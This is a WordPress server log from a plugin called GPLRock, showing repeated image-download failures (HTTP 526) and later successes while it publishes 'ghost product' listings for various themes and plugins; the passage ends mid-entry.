Ghost product published with image - Product ID: aroland-single-property-landing-page-wordpress-theme [05-Apr-2026 04:01:37 UTC] GPLRock: Image download failed for product facmaster-factory-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:39 UTC] GPLRock: Image download failed for product facmaster-factory-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facmaster---factory--industrial-wordpress-theme-29362.webp for product facmaster-factory-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:41 UTC] GPLRock: Image download failed for product facmaster-factory-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:43 UTC] GPLRock: Image download failed for product facmaster-factory-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facmaster---factory--industrial-wordpress-theme-29362.webp for product facmaster-factory-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:45 UTC] GPLRock WARNING: Image download failed for product facmaster-factory-industrial-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/facmaster---factory--industrial-wordpress-theme-29362.webp [05-Apr-2026 04:01:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: facmaster-factory-industrial-wordpress-theme [05-Apr-2026 04:01:46 UTC] GPLRock: Image download failed for product personal-the-best-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:48 UTC] GPLRock: Image download failed for product personal-the-best-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal---the-best-blog-wordpress-theme-10555.webp for product personal-the-best-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:51 UTC] GPLRock: Image download failed for product personal-the-best-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:53 UTC] GPLRock: Image download failed for product personal-the-best-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal---the-best-blog-wordpress-theme-10555.webp for product personal-the-best-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:55 UTC] GPLRock WARNING: Image download failed for product personal-the-best-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/personal---the-best-blog-wordpress-theme-10555.webp [05-Apr-2026 04:01:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: personal-the-best-blog-wordpress-theme [05-Apr-2026 04:01:55 UTC] GPLRock: Image download failed for product wpcasterpro-podcast-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:57 UTC] GPLRock: Image download failed for product wpcasterpro-podcast-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcasterpro---podcast-wordpress-theme-29678.webp for product wpcasterpro-podcast-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:59 UTC] GPLRock: Image download failed for product wpcasterpro-podcast-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:01 UTC] GPLRock: Image download failed for product wpcasterpro-podcast-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcasterpro---podcast-wordpress-theme-29678.webp for product wpcasterpro-podcast-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:03 UTC] GPLRock WARNING: Image download failed for product wpcasterpro-podcast-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wpcasterpro---podcast-wordpress-theme-29678.webp [05-Apr-2026 04:02:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpcasterpro-podcast-wordpress-theme [05-Apr-2026 04:02:04 UTC] GPLRock: Image download failed for product finderland-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:06 UTC] GPLRock: Image download failed for product finderland-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finderland---real-estate-wordpress-theme-32273.webp for product finderland-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:08 UTC] GPLRock: Image download failed for product finderland-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:10 UTC] GPLRock: Image download failed for product finderland-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finderland---real-estate-wordpress-theme-32273.webp for product finderland-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:12 UTC] GPLRock WARNING: Image download failed for product finderland-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finderland---real-estate-wordpress-theme-32273.webp [05-Apr-2026 04:02:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finderland-real-estate-wordpress-theme [05-Apr-2026 04:02:12 UTC] GPLRock: Image download failed for product lotusgreen-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:14 UTC] GPLRock: Image download failed for product lotusgreen-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lotusgreen---multipurpose-woocommerce-theme-434.webp for product lotusgreen-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:17 UTC] GPLRock: Image download failed for product lotusgreen-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:19 UTC] GPLRock: Image download failed for product lotusgreen-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lotusgreen---multipurpose-woocommerce-theme-434.webp for product lotusgreen-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:21 UTC] GPLRock WARNING: Image download failed for product lotusgreen-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/lotusgreen---multipurpose-woocommerce-theme-434.webp [05-Apr-2026 04:02:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lotusgreen-multipurpose-woocommerce-theme [05-Apr-2026 04:02:43 UTC] GPLRock: Image download failed for product smart-qr-codes-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:46 UTC] GPLRock: Image download failed for product smart-qr-codes-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-qr-codes-generator---plugin-for-wordpress-9170.webp for product smart-qr-codes-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:48 UTC] GPLRock: Image download failed for product smart-qr-codes-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:50 UTC] GPLRock: Image download failed for product smart-qr-codes-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-qr-codes-generator---plugin-for-wordpress-9170.webp for product smart-qr-codes-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:52 UTC] GPLRock WARNING: Image download failed for product smart-qr-codes-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/smart-qr-codes-generator---plugin-for-wordpress-9170.webp [05-Apr-2026 04:02:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smart-qr-codes-generator-plugin-for-wordpress [05-Apr-2026 04:02:52 UTC] GPLRock: Image download failed for product instagram-theatre (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:54 UTC] GPLRock: Image download failed for product instagram-theatre (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-theatre-32275.webp for product instagram-theatre after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:02:56 UTC] GPLRock: Image download failed for product instagram-theatre (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:02:59 UTC] GPLRock: Image download failed for product instagram-theatre (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-theatre-32275.webp for product instagram-theatre after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:01 UTC] GPLRock WARNING: Image download failed for product instagram-theatre. URL: https://meldwp.com/wp-content/uploads/instagram-theatre-32275.webp [05-Apr-2026 04:03:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: instagram-theatre [05-Apr-2026 04:03:01 UTC] GPLRock: Image download failed for product alipay-cross-border-online-payment-2 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:03 UTC] GPLRock: Image download failed for product alipay-cross-border-online-payment-2 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alipay-cross-border-online-payment-23171.webp for product alipay-cross-border-online-payment-2 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:05 UTC] GPLRock: Image download failed for product alipay-cross-border-online-payment-2 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:07 UTC] GPLRock: Image download failed for product alipay-cross-border-online-payment-2 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alipay-cross-border-online-payment-23171.webp for product alipay-cross-border-online-payment-2 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:10 UTC] GPLRock WARNING: Image download failed for product alipay-cross-border-online-payment-2. URL: https://meldwp.com/wp-content/uploads/alipay-cross-border-online-payment-23171.webp [05-Apr-2026 04:03:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alipay-cross-border-online-payment-2 [05-Apr-2026 04:03:10 UTC] GPLRock: Image download failed for product woocommerce-product-slider-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:12 UTC] GPLRock: Image download failed for product woocommerce-product-slider-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-slider-for-elementor-2172.webp for product woocommerce-product-slider-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:14 UTC] GPLRock: Image download failed for product woocommerce-product-slider-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:16 UTC] GPLRock: Image download failed for product woocommerce-product-slider-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-slider-for-elementor-2172.webp for product woocommerce-product-slider-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-slider-for-elementor. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-slider-for-elementor-2172.webp [05-Apr-2026 04:03:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-slider-for-elementor [05-Apr-2026 04:03:18 UTC] GPLRock: Image download failed for product grace-wordpress-photo-feed-of-instagram-posts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:21 UTC] GPLRock: Image download failed for product grace-wordpress-photo-feed-of-instagram-posts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grace--wordpress-photo-feed-of-instagram-posts-30637.webp for product grace-wordpress-photo-feed-of-instagram-posts after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:23 UTC] GPLRock: Image download failed for product grace-wordpress-photo-feed-of-instagram-posts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:25 UTC] GPLRock: Image download failed for product grace-wordpress-photo-feed-of-instagram-posts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grace--wordpress-photo-feed-of-instagram-posts-30637.webp for product grace-wordpress-photo-feed-of-instagram-posts after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:27 UTC] GPLRock WARNING: Image download failed for product grace-wordpress-photo-feed-of-instagram-posts. URL: https://meldwp.com/wp-content/uploads/grace--wordpress-photo-feed-of-instagram-posts-30637.webp [05-Apr-2026 04:03:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grace-wordpress-photo-feed-of-instagram-posts [05-Apr-2026 04:03:27 UTC] GPLRock: Image download failed for product responsive-searchable-3-level-accordion-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:29 UTC] GPLRock: Image download failed for product responsive-searchable-3-level-accordion-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-searchable-3-level-accordion-for-wordpress-16099.webp for product responsive-searchable-3-level-accordion-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:31 UTC] GPLRock: Image download failed for product responsive-searchable-3-level-accordion-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:33 UTC] GPLRock: Image download failed for product responsive-searchable-3-level-accordion-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-searchable-3-level-accordion-for-wordpress-16099.webp for product responsive-searchable-3-level-accordion-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:36 UTC] GPLRock WARNING: Image download failed for product responsive-searchable-3-level-accordion-for-wordpress. URL: https://meldwp.com/wp-content/uploads/responsive-searchable-3-level-accordion-for-wordpress-16099.webp [05-Apr-2026 04:03:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-searchable-3-level-accordion-for-wordpress [05-Apr-2026 04:03:36 UTC] GPLRock: Image downloaded successfully for product multi-vendor-sms-notification-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb8b3a88.webp [05-Apr-2026 04:03:36 UTC] GPLRock: Using pre-downloaded image for product multi-vendor-sms-notification-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb8b3a88.webp [05-Apr-2026 04:03:36 UTC] GPLRock: Ghost product published with image - Product ID: multi-vendor-sms-notification-for-woocommerce [05-Apr-2026 04:03:36 UTC] GPLRock: Image download failed for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:38 UTC] GPLRock: Image download failed for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yoori-ecommerce--single--multi-vendor-pwa-marketplace-cms-26914.webp for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:40 UTC] GPLRock: Image download failed for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:42 UTC] GPLRock: Image download failed for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yoori-ecommerce--single--multi-vendor-pwa-marketplace-cms-26914.webp for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:44 UTC] GPLRock WARNING: Image download failed for product yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms. URL: https://meldwp.com/wp-content/uploads/yoori-ecommerce--single--multi-vendor-pwa-marketplace-cms-26914.webp [05-Apr-2026 04:03:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yoori-ecommerce-single-multi-vendor-pwa-marketplace-cms [05-Apr-2026 04:03:44 UTC] GPLRock: Image download failed for product paymaster-multipurpose-payment-gateway (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:47 UTC] GPLRock: Image download failed for product paymaster-multipurpose-payment-gateway (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paymaster---multipurpose-payment-gateway-21307.webp for product paymaster-multipurpose-payment-gateway after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:49 UTC] GPLRock: Image download failed for product paymaster-multipurpose-payment-gateway (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:51 UTC] GPLRock: Image download failed for product paymaster-multipurpose-payment-gateway (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paymaster---multipurpose-payment-gateway-21307.webp for product paymaster-multipurpose-payment-gateway after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:53 UTC] GPLRock WARNING: Image download failed for product paymaster-multipurpose-payment-gateway. URL: https://meldwp.com/wp-content/uploads/paymaster---multipurpose-payment-gateway-21307.webp [05-Apr-2026 04:03:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paymaster-multipurpose-payment-gateway [05-Apr-2026 04:03:53 UTC] GPLRock: Image download failed for product wp-mega-pack-for-news-blog-and-magazine-all-you-need (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:55 UTC] GPLRock: Image download failed for product wp-mega-pack-for-news-blog-and-magazine-all-you-need (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:03:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-mega-pack-for-news-blog-and-magazine---all-you-need-23215.webp for product wp-mega-pack-for-news-blog-and-magazine-all-you-need after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:03:58 UTC] GPLRock: Image download failed for product wp-mega-pack-for-news-blog-and-magazine-all-you-need (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:04:00 UTC] GPLRock: Image download failed for product wp-mega-pack-for-news-blog-and-magazine-all-you-need (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:04:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-mega-pack-for-news-blog-and-magazine---all-you-need-23215.webp for product wp-mega-pack-for-news-blog-and-magazine-all-you-need after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:04:02 UTC] GPLRock WARNING: Image download failed for product wp-mega-pack-for-news-blog-and-magazine-all-you-need. URL: https://meldwp.com/wp-content/uploads/wp-mega-pack-for-news-blog-and-magazine---all-you-need-23215.webp [05-Apr-2026 04:04:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-mega-pack-for-news-blog-and-magazine-all-you-need [05-Apr-2026 04:06:30 UTC] GPLRock: Image downloaded successfully for product outlet-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b245022e.jpg [05-Apr-2026 04:06:30 UTC] GPLRock: Using pre-downloaded image for product outlet-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b245022e.jpg [05-Apr-2026 04:06:30 UTC] GPLRock: Ghost product published with image - Product ID: outlet-storefront-woocommerce-theme [05-Apr-2026 04:06:31 UTC] GPLRock: Image downloaded successfully for product soliloquy-pinterest-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61c45009.jpg [05-Apr-2026 04:06:31 UTC] GPLRock: Using pre-downloaded image for product soliloquy-pinterest-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61c45009.jpg [05-Apr-2026 04:06:31 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-pinterest-addon [05-Apr-2026 04:06:33 UTC] GPLRock: Image downloaded successfully for product woocommerce-role-based-payment-shipping-methods (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-139707ec.jpg [05-Apr-2026 04:06:33 UTC] GPLRock: Using pre-downloaded image for product woocommerce-role-based-payment-shipping-methods: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-139707ec.jpg [05-Apr-2026 04:06:33 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-role-based-payment-shipping-methods [05-Apr-2026 04:06:35 UTC] GPLRock: Image downloaded successfully for product css-igniter-oxium-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74ff7580.jpg [05-Apr-2026 04:06:35 UTC] GPLRock: Using pre-downloaded image for product css-igniter-oxium-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74ff7580.jpg [05-Apr-2026 04:06:35 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-oxium-wordpress-theme [05-Apr-2026 04:06:36 UTC] GPLRock: Image downloaded successfully for product social-counter-plugin-for-wordpress-arqam (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18cad9d9.jpg [05-Apr-2026 04:06:36 UTC] GPLRock: Using pre-downloaded image for product social-counter-plugin-for-wordpress-arqam: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18cad9d9.jpg [05-Apr-2026 04:06:36 UTC] GPLRock: Ghost product published with image - Product ID: social-counter-plugin-for-wordpress-arqam [05-Apr-2026 04:06:38 UTC] GPLRock: Image downloaded successfully for product fable-children-kindergarten-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-608876d5.jpg [05-Apr-2026 04:06:38 UTC] GPLRock: Using pre-downloaded image for product fable-children-kindergarten-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-608876d5.jpg [05-Apr-2026 04:06:38 UTC] GPLRock: Ghost product published with image - Product ID: fable-children-kindergarten-wordpress-theme [05-Apr-2026 04:06:40 UTC] GPLRock: Image downloaded successfully for product yith-remy-food-and-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac65c449.jpg [05-Apr-2026 04:06:40 UTC] GPLRock: Using pre-downloaded image for product yith-remy-food-and-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac65c449.jpg [05-Apr-2026 04:06:40 UTC] GPLRock: Ghost product published with image - Product ID: yith-remy-food-and-restaurant-wordpress-theme [05-Apr-2026 04:06:42 UTC] GPLRock: Image downloaded successfully for product css-igniter-salon-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-057f1937.jpg [05-Apr-2026 04:06:42 UTC] GPLRock: Using pre-downloaded image for product css-igniter-salon-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-057f1937.jpg [05-Apr-2026 04:06:42 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-salon-wordpress-theme [05-Apr-2026 04:06:44 UTC] GPLRock: Image downloaded successfully for product mythemeshop-clock-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da218c57.jpg [05-Apr-2026 04:06:44 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-clock-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da218c57.jpg [05-Apr-2026 04:06:44 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-clock-wordpress-theme [05-Apr-2026 04:06:45 UTC] GPLRock: Image downloaded successfully for product livemesh-addons-for-beaver-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-25665788.jpg [05-Apr-2026 04:06:45 UTC] GPLRock: Using pre-downloaded image for product livemesh-addons-for-beaver-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-25665788.jpg [05-Apr-2026 04:06:45 UTC] GPLRock: Ghost product published with image - Product ID: livemesh-addons-for-beaver-builder [05-Apr-2026 04:07:42 UTC] GPLRock: Image downloaded successfully for product walkon-adventure-travel-tourism-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfee16da.webp [05-Apr-2026 04:07:42 UTC] GPLRock: Using pre-downloaded image for product walkon-adventure-travel-tourism-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfee16da.webp [05-Apr-2026 04:07:42 UTC] GPLRock: Ghost product published with image - Product ID: walkon-adventure-travel-tourism-elementor-template-kit [05-Apr-2026 04:07:43 UTC] GPLRock: Image downloaded successfully for product walkaway-travel-blog-tours-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-81fe22fe.webp [05-Apr-2026 04:07:44 UTC] GPLRock: Using pre-downloaded image for product walkaway-travel-blog-tours-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-81fe22fe.webp [05-Apr-2026 04:07:44 UTC] GPLRock: Ghost product published with image - Product ID: walkaway-travel-blog-tours-elementor-template-kit [05-Apr-2026 04:07:45 UTC] GPLRock: Image downloaded successfully for product wadon-feminine-business-consultant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eebed8ef.webp [05-Apr-2026 04:07:45 UTC] GPLRock: Using pre-downloaded image for product wadon-feminine-business-consultant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eebed8ef.webp [05-Apr-2026 04:07:45 UTC] GPLRock: Ghost product published with image - Product ID: wadon-feminine-business-consultant-elementor-template-kit [05-Apr-2026 04:07:46 UTC] GPLRock: Image downloaded successfully for product vontex-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-adba9c68.webp [05-Apr-2026 04:07:47 UTC] GPLRock: Using pre-downloaded image for product vontex-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-adba9c68.webp [05-Apr-2026 04:07:47 UTC] GPLRock: Ghost product published with image - Product ID: vontex-digital-agency-elementor-template-kit [05-Apr-2026 04:07:48 UTC] GPLRock: Image downloaded successfully for product voltee-volunteering-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1c54ff07.webp [05-Apr-2026 04:07:48 UTC] GPLRock: Using pre-downloaded image for product voltee-volunteering-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1c54ff07.webp [05-Apr-2026 04:07:48 UTC] GPLRock: Ghost product published with image - Product ID: voltee-volunteering-service-elementor-template-kit [05-Apr-2026 04:07:49 UTC] GPLRock: Image downloaded successfully for product voltech-tech-digital-startup-company-elementor-template-kit (attempt 1) to: 